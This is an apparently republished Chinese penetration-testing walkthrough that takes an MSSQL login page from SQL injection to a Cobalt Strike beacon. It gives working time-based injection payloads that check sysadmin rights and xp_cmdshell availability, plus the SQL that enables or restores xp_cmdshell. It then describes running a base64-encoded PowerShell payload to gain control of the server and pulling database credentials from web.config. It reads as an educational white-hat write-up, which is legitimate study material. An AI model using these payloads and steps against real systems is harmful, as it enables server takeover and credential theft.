前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【实战篇】从mssql注入到上线CobaltStrike

【实战篇】从mssql注入到上线CobaltStrike

作者头像
一名白帽的成长史
发布2021-04-08 20:25:58
2.6K0
发布2021-04-08 20:25:58
举报

Part.1

mssql注入

mssql注入

首先打开目标是一个登陆界面:

通过burp抓包,发现登陆口存在sql注入:

尝试延时注入,成功:

判断是否为dba权限(也可用sqlmap的–is-dba判断>):

代码语言:javascript
复制
action=login&name=admin';if(1=(select is_srvrolemember('sysadmin'))) WAITFOR DELAY '0:0:5';--&psw=admin

判断是否为站库分离:

代码语言:javascript
复制
uname=test';if(host_name()=@@servername)WAITFOR DELAY '0:0:5';--

检查是否开启xp_cmdshell:

代码语言:javascript
复制
action=login&name=admin';if(1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')) WAITFOR DELAY '0:0:5'--&psw=admin

响应包出现延时,可以执行系统命令~

如果没有开启,通过以下命令开启:

代码语言:javascript
复制

(1)恢复/删除xp_cmdshell
exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
exec sp_dropextendedproc 'xplog70.dll'
(2)# 关闭xp_cmdshell
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',0;
RECONFIGURE;
(3)# 启用xp_cmdshell
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

Part.2

上线Cobalt Strike

上线Cobalt Strike

首先打开Cobalt Strike:

生成powershell类型的payload:

由于存在单引号,无法直接执行,将payload进行base64加密:

代码语言:javascript
复制
http://www.jackson-t.ca/runtime-exec-payloads.html

通过xp_cmdshell执行powershell payload:

查看web log,发现存在访问记录:

事件日志显示服务器上线:

beacon上线,执行系统命令:

上线后翻找服务器文件,可以在inetput目录下找到web服务配置文件:

//inetpub文件夹是IIS(Internet Information Services)中Windows站点的根。

Web.config包含数据库配置:

成功连接数据库:

本文参与?腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-03-25,如有侵权请联系?cloudcommunity@tencent.com 删除

本文分享自 一名白帽的成长史 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与?腾讯云自媒体分享计划? ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
http://www.vxiaotou.com